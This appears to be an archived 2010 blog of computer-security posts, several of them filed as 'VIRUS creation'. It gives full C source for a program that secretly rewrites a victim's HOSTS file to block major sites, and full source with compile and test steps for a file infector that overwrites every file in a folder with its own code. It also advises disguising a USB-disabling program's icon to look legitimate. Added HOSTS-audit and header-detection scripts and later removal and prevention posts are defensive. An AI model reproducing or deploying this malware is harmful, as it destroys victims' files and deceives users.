Archive for July 9, 2010

How to block a website manually?

Sometimes it becomes necessary to block a website on our computers for one reason or another. You can easily and effectively block access to a website by adding it to your Windows HOSTS file. Once the website is blocked in the HOSTS file, it will not appear in any of the browsers. That is, the website becomes completely unavailable.

1. Go to your HOSTS file which is located at:

C:\WINDOWS\SYSTEM32\DRIVERS\ETC for Vista and XP
C:\WINNT\SYSTEM32\DRIVERS\ETC for Win 2000
C:\WINDOWS for Windows 98 and ME

2. Open HOSTS with Notepad.

The default Windows HOSTS looks like this:
______________________

# Copyright © 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a “#” symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
#
127.0.0.1 localhost

3. Directly under the line that says 127.0.0.1 localhost, type the loopback address followed by the host name of the site you want to block (the host name only, not a URL with http://):

127.0.0.1 name of the site you want to block

For example, to block the website MySpace.com, simply type:

127.0.0.1 myspace.com
127.0.0.1 www.myspace.com

Other parts of MySpace could be blocked in a similar way:

127.0.0.1 search.myspace.com
127.0.0.1 profile.myspace.com
and so on.

It is necessary to add a website both with and without the “www.” prefix, because the HOSTS file matches host names exactly. You can add any number of websites to this list.

4. Close Notepad and answer “Yes” when prompted to save the changes.

5. After blocking the website, test it in any browser. If everything was done as described above, the website must not appear in any of the web browsers. You should see a “Cannot find server” or DNS error saying: “The page cannot be displayed”. I have also created a virus to block a website, which automatically blocks a list of websites as specified in the source program.

Some people may suggest adding a website to the Internet Explorer ‘Privacy’ settings. This does not block a site. It only stops that site from using cookies.

Virus program to block websites

Most of us are familiar with the virus that used to block the Orkut and YouTube sites. If you are curious about creating such a virus on your own, here is how it can be done. Here is the C source code to create the virus that blocks websites. I will give a brief introduction about this virus before I jump into the technical jargon.

This virus has been created exclusively in C, so anyone with a basic knowledge of C will be able to understand how it works. The virus needs to be clicked only once by the victim. Once it is clicked, it will block the list of websites specified in the source code. The victim will never be able to surf those websites unless he reinstalls the operating system. The blocking is not confined to IE or Firefox, so once blocked, the site will not appear in any browser program.

NOTE: You can also block a website manually. But here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website manually?

Here is the source code of the virus.

#include<stdio.h>
#include<dos.h>
#include<dir.h>
char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;

int find_root(void);
void block_site(void);

int find_root()
{
int done;
struct ffblk ffblk;//File block structure

done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

else return 0;
}

void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/

fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}

void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}

How to Compile?

For a step-by-step compilation guide, refer to my post How to compile C Programs.

Testing

1. To test, run the compiled module. It will block the sites that are listed in the source code.

2. Once you run the file block_Site.exe, restart your browser program. Then type the URL of the blocked site and you’ll see the browser showing the error “Page cannot be displayed”.

3. To remove the virus, type the following in the Run dialog:

%windir%\system32\drivers\etc

4. There, open the file named “hosts” using Notepad. At the bottom of the opened file you’ll see something like this:

127.0.0.1                                google.com

5. Delete all such entries which contain the names of blocked sites.
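
A check for the cleanup steps above and for the manual blocking post, as an added example that is not part of the original post: it parses HOSTS content and reports entries that point a host at a loopback or unspecified address, entries that map a watched host to any other address, and entries that are URLs rather than host names. The watch list, the sample file and the finding labels are assumptions made for this illustration.

```python
import ipaddress

# Constructed sample: a default-style entry plus lines like the ones appended above.
SAMPLE_HOSTS = """\
# sample HOSTS file (constructed for this example)
127.0.0.1 localhost
102.54.94.97 rhino.acme.com # source server

127.0.0.1\tgoogle.com
127.0.0.1\twww.google.com
0.0.0.0 www.youtube.com
127.0.0.1 http://www.example.com
203.0.113.7 mail.yahoo.com
"""

# Domains that should always resolve through DNS (assumed watch list).
WATCHED = ("google.com", "youtube.com", "yahoo.com")


def parse_hosts(text):
    """Yield (line_number, address, names) for every mapping line."""
    for number, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # drop comments
        if line:
            address, *names = line.split()
            yield number, address, names


def is_watched(host):
    return any(host == d or host.endswith("." + d) for d in WATCHED)


def audit_hosts(text):
    """Return (line_number, finding, name) tuples for suspicious entries."""
    findings = []
    for number, address, names in parse_hosts(text):
        try:
            ip = ipaddress.ip_address(address)
        except ValueError:
            findings.append((number, "invalid-address", address))
            continue
        sinkhole = ip.is_loopback or ip.is_unspecified
        for name in names:
            host = name.lower().rstrip(".")
            if "/" in host or ":" in host:
                # A URL is never matched by the resolver; the entry has no effect.
                findings.append((number, "not-a-hostname", name))
            elif host == "localhost":
                continue
            elif is_watched(host):
                kind = "watched-host-blocked" if sinkhole else "watched-host-redirected"
                findings.append((number, kind, host))
            elif sinkhole:
                findings.append((number, "host-blocked", host))
    return findings


if __name__ == "__main__":
    for finding in audit_hosts(SAMPLE_HOSTS):
        print(*finding)
```

To audit a real machine, pass the text of the file under %windir%\system32\drivers\etc to audit_hosts instead of the sample.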

Hope you liked the post. Please pass comments.

WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE!!!

Categories: VIRUS creation

Virus program to disable USB port

In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). Here I use the C programming language to create this virus. Anyone with a basic knowledge of the C language should be able to understand the working of this virus program.

Once this virus is executed, it will immediately disable all the USB ports on the computer. As a result, you will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries, since I have also given a program to re-enable all the USB ports.

Virus to disable USB ports

1. Download the USB_Block.rar file on to your computer.

2. It contains the following two files.

  • block_usb.c (source code)
  • unblock_usb.c (source code)

3. You need to compile them before you can run them. A step-by-step procedure to compile C programs is given in my post. Do not compile the virus file just like that; please read my article on spreading virus through C compiler for clear compilation.

4. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).

5. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe (you need to compile unblock_usb.c) file. Insert the pen drive and it will get detected now.

6. You can also change the icon of this file to make it look like a legitimate program.

I hope you like this post. Please pass your comments.

WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE!!!

Categories: VIRUS creation

Spreading virus through C compiler

This program is an example of how to create a virus in C. It demonstrates a simple virus program which, upon execution (running), creates a copy of itself in other files. Thus it destroys other files by infecting them. The infected file is in turn capable of spreading the infection to another file, and so on. Here’s the source code of the virus program.

#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048
,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

COMPILING METHOD::

USING BORLAND TC++ 3.0 (16-BIT):

1. Load the program in the compiler, press Alt-F9 to compile

2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDING YOUR COMPILER)

3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)

4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)

5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect

USING BORLAND C++ 5.5 (32-BIT) :

1. Compile once,note down the generated EXE file length in bytes

2. Change the value of X in source code to this length in bytes

3. Recompile it.The new EXE file is ready to infect

HOW TO TEST:

1. Open new empty folder

2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)

3. Run the virus EXE file there you will see all the files in the current directory get infected.

4. All the infected files will be ready to reinfect

That’s it!!!

WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE!!!
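
Seen from the defender's side, the program above leaves a recognisable trace: every file it has touched in a directory begins with the same executable image. The following added example (not part of the original post) groups the files of a directory by a hash of their first 2048 bytes and reports groups that start with the MZ executable magic, then lists the members whose extension says they should not be executables; PREFIX_LEN, the extension set, the file names and the sample data are assumptions constructed for this illustration.

```python
import hashlib
import os
import tempfile
from collections import defaultdict

PREFIX_LEN = 2048   # bytes compared per file (assumed; equals the listing's buffer size)
EXECUTABLE_EXT = {".exe", ".dll", ".com", ".scr", ".sys"}


def find_shared_headers(directory, min_group=2):
    """Return groups of file names whose first PREFIX_LEN bytes are identical
    and begin with the MZ magic of a DOS/Windows executable."""
    groups = defaultdict(list)
    with os.scandir(directory) as entries:
        for entry in sorted(entries, key=lambda e: e.name):
            if not entry.is_file(follow_symlinks=False):
                continue
            with open(entry.path, "rb") as handle:
                block = handle.read(PREFIX_LEN)
            if len(block) == PREFIX_LEN and block.startswith(b"MZ"):
                groups[hashlib.sha256(block).digest()].append(entry.name)
    return [names for names in groups.values() if len(names) >= min_group]


def type_mismatches(names):
    """Files that start like an executable but are not named like one."""
    return [n for n in names if os.path.splitext(n)[1].lower() not in EXECUTABLE_EXT]


def build_sample(directory):
    """Constructed test data: three files sharing one header, two clean files."""
    shared = b"MZ" + bytes(range(256)) * 8            # 2 + 2048 bytes
    files = {
        "report.doc": shared + b"original document tail",
        "photo.jpg": shared + b"original image tail",
        "tool.exe": shared + b"original program tail",
        "clean.exe": b"MZ" + b"\x90" * 4096,          # executable, different header
        "notes.txt": b"plain text " * 400,            # not an executable at all
    }
    for name, data in files.items():
        with open(os.path.join(directory, name), "wb") as handle:
            handle.write(data)


def demo():
    """Build the sample in a temporary directory and return (groups, mismatches)."""
    with tempfile.TemporaryDirectory() as directory:
        build_sample(directory)
        groups = find_shared_headers(directory)
        return groups, [type_mismatches(g) for g in groups]


if __name__ == "__main__":
    for group, odd in zip(*demo()):
        print("shared executable header:", group, "| unexpected type:", odd)
```

A reported group is a triage lead rather than a verdict, since identical copies of a legitimate program also share a header; the type mismatches are the stronger signal.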

Categories: VIRUS creation

How to remove MSN virus

[msnvirus.jpg]

MSN messages like the above title, some of which read “Is that you on that photo…” or similar, have been popping up on my Instant Messenger on a daily basis. If you are receiving these messages like I do, that means your friend on the other end has been infected by an MSN virus. I’m not sure if it’s deadly, but it’s sure disturbing.

These viruses go by various names: MSN Virus Project 1; Generic2.EXO; Backdoor.Generic3.SAT. Once a machine is infected, the virus spreads across the contact list and sends out the above message (or a similar one). If any of your IM contacts clicks on it, they will be taken via Internet Explorer to download a file named photo656.pif. If the user downloads it, there goes another user.

PROCEDURE TO REMOVE MSN VIRUS::

Follow the steps to remove MSN virus/ Generic2.EXO / Backdoor.Generic3.S

1. Uninstall MSN Messenger.

2. Go to Start > Control Panel > Add/Remove Programs.

3. Find Toolbar888 and uninstall it.

4. Press CTRL+ALT+DELETE.

5. End the following processes (if you can’t find all of them, don’t worry, just end the processes that are found):

  • Update.exe
  • goll.exe
  • loadadv455.exe
  • drsmartload.exe
  • two.exe
  • vcncr.exe
  • rorjxk.exe
  • eyewblbby.exe
  • cgqrvrva.exe

6. Now delete the following folders:

  • C:\Program Files\Common Files\{28676FB5-0AE9-3081-1205-03030930003d}\
  • C:\Program Files\Common Files\{38676FB5-0AE9-3081-1205-03030930003d}\

7. Search for and delete all occurrences of the following files (don’t worry if you don’t find all of these):

  • goll.exe
  • drv.exe
  • loadadv455.exe
  • one.exe
  • two.exe

The files are found in:

  • C:\Windows\system32\
  • C:\Documents and Settings\[current user] ([current user] is the name you are currently logged on as)
  • C:\ (be careful what you delete here)

8. Scan your computer with an antivirus program. After that, all you may need to do is reinstall MSN Messenger.

So this is how the MSN virus can be removed.

How to fix your infected computer

Is your PC infected by viruses, spyware, etc.? Does your PC take a long time to start? Are you looking for tools to fix your infected computer? Then this post is just for you.
I get asked this question frequently: “How to fix your infected computer”. I have posted here many ways to fix your infected computer and make it start faster.

Steps to fix your Infected computer:

Here are some steps you need to take when fixing your infected computer:

Antivirus software

1.Kaspersky:

It is one of the best antivirus products available on the web. Kaspersky Anti-Virus features include real-time protection, detection and removal of viruses, trojans, worms, spyware, adware, keyloggers, malicious tools and auto-dialers, as well as detection and removal of rootkits. It also includes instantaneous automatic updates via the “Kaspersky Security Network” service.

2.Avira

Avira uses very little CPU and is quite compact. Avira Free is much better than Avira Premium even though it offers web filter and mail filter.

3.AVG

AVG is one of the most used antivirus programs nowadays. Most of all, it is free and includes antispyware too. It is very light and does not take up too much disk space.

4.Norton

Quite slow if you have 512 MB or 1 GB of RAM; only users with 2 GB or 3 GB of RAM are advised to use this software. But it is extremely good at virus detection and does not leave a single trace of any damage. It detects 90% of viruses, but it is not better than Kaspersky.

Antispyware:

Spyware is a type of malware that is installed on computers and that collects information about users without their knowledge. The presence of spyware is typically hidden from the user. Typically, spyware is secretly installed on the user’s personal computer. Sometimes, however, spywares such as keyloggers are installed by the owner of a shared, corporate, or public computer on purpose in order to secretly monitor other users.

Antispyware is the second step to fix your infected computer. Running anti-spyware software has become a widely recognized element of computer security practices for computers, especially those running Microsoft Windows. A number of jurisdictions have passed anti-spyware laws, which usually target any software that is surreptitiously installed to control a user’s computer.

Here is a list of some antispyware programs which I would recommend:

1.Ad-Aware Free Anniversary Edition 8.0.7:
It detects spyware files and helps you remove them quickly and easily. You can choose which modules to remove, keep registry files, and personalize the program’s menu.

2.a-squared Free 4.5.0.8:
Also known as a², it specializes in detecting and eliminating malware (all types of harmful files). As of today, a-squared detects and eliminates more than 24.000 trojans, 67.000 worms, 40.000 dialers, 11.000 spyware and 70.000 plans or signs.

3.Malwarebytes Anti-Malware:
This anti-spyware tool scans the disks for malware, with the option to remove it. It can be scheduled to scan the PC at a certain hour. It keeps lists of quarantined and ignored files. Real-time protection (which detects threats before they enter the system) can be activated, but it is a paid feature.

Others include Spyware Blaster, Spy Defence, etc.

Registry scanner:

Next you need a registry scanner to fix your infected computer. Viruses often write entries of their own into the registry, so you are only 50% done after you delete the virus.
There are many registry cleaners available, such as:

1.Eusing Free Registry Cleaner/scanner
2.Registry fix
3.Auslogics registry cleaner(My recommendation)

Trojan horse removal:

For this you can read my post on “Trojan horse removal”.

Ccleaner:

After that you can download CCleaner and optimize your computer speed by deleting unwanted registry and internet tracing cookies and temporary files.

Note: Anti-Malware Toolkit is a program that automatically downloads all of the recommended programs to help users clean their computers and have them running at peak performance again.




Categories: computer security

Securing Network from Trojans

Types of Trojans:

1.Remote Access Trojans

2.Password Sending Trojans







How to Get Rid of Trojans:
Here are some practical tips to avoid getting infected.

  1. NEVER download blindly from people or sites which you aren’t 100% sure about. In other words, as the old saying goes, don’t accept candy from strangers. If you do a lot of file downloading, it’s often just a matter of time before you fall victim to a trojan.
  2. Even if the file comes from a friend, you still must be sure what the file is before opening it, because many trojans will automatically try to spread themselves to friends in an email address book or on an IRC channel. There is seldom reason for a friend to send you a file that you didn’t ask for. When in doubt, ask them first, and scan the attachment with a fully updated anti-virus program.
  3. Beware of hidden file extensions! Windows by default hides the last extension of a file, so that innocuous-looking “susie.jpg” might really be “susie.jpg.exe” – an executable trojan! To reduce the chances of being tricked, unhide those pesky extensions.
  4. NEVER use features in your programs that automatically get or preview files. Those features may seem convenient, but they let anybody send you anything which is extremely reckless. For example, never turn on “auto DCC get” in mIRC, instead ALWAYS screen every single file you get manually. Likewise, disable the preview mode in Outlook and other email programs.
  5. Never blindly type commands that others tell you to type, or go to web addresses mentioned by strangers, or run pre-fabricated programs or scripts (not even popular ones). If you do so, you are potentially trusting a stranger with control over your computer, which can lead to trojan infection or other serious harm.
  6. Don’t be lulled into a false sense of security just because you run anti-virus programs. Those do not protect perfectly against many viruses and trojans, even when fully up to date. Anti-virus programs should not be your front line of security, but instead they serve as a backup in case something sneaks onto your computer.
  7. Finally, don’t download an executable program just to “check it out” – if it’s a trojan, the first time you run it, you will be infected!
To manually remove a trojan from your computer, read my article on Removing Trojan horse manually.

Removing Trojan horse manually

A Trojan, sometimes referred to as a Trojan horse, is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user’s computer system.

Is trojan virus Dangerous?

The short answer is yes, and the long answer is sometimes, because there are near a thousand different trojan horse viruses and they all will most likely alter your computer in some way or another.

WORKING OF TROJANS::

[Image: working of a trojan]

In this tutorial I will tell you a method through which you can manually remove a Trojan horse. Sometimes a trojan horse disables your antivirus and prevents any other antivirus from being installed.

1-Go to My Computer
2-Drive C
3-Program Files
4-Common Files
5-Microsoft Shared
6-MS Info or msinfo32


The virus might hide itself in startup, so delete the temporary internet files.

Is there any way to prevent a Trojan attack?
I have written an article on securing network from trojans; it explains how to keep Trojans out of your PC.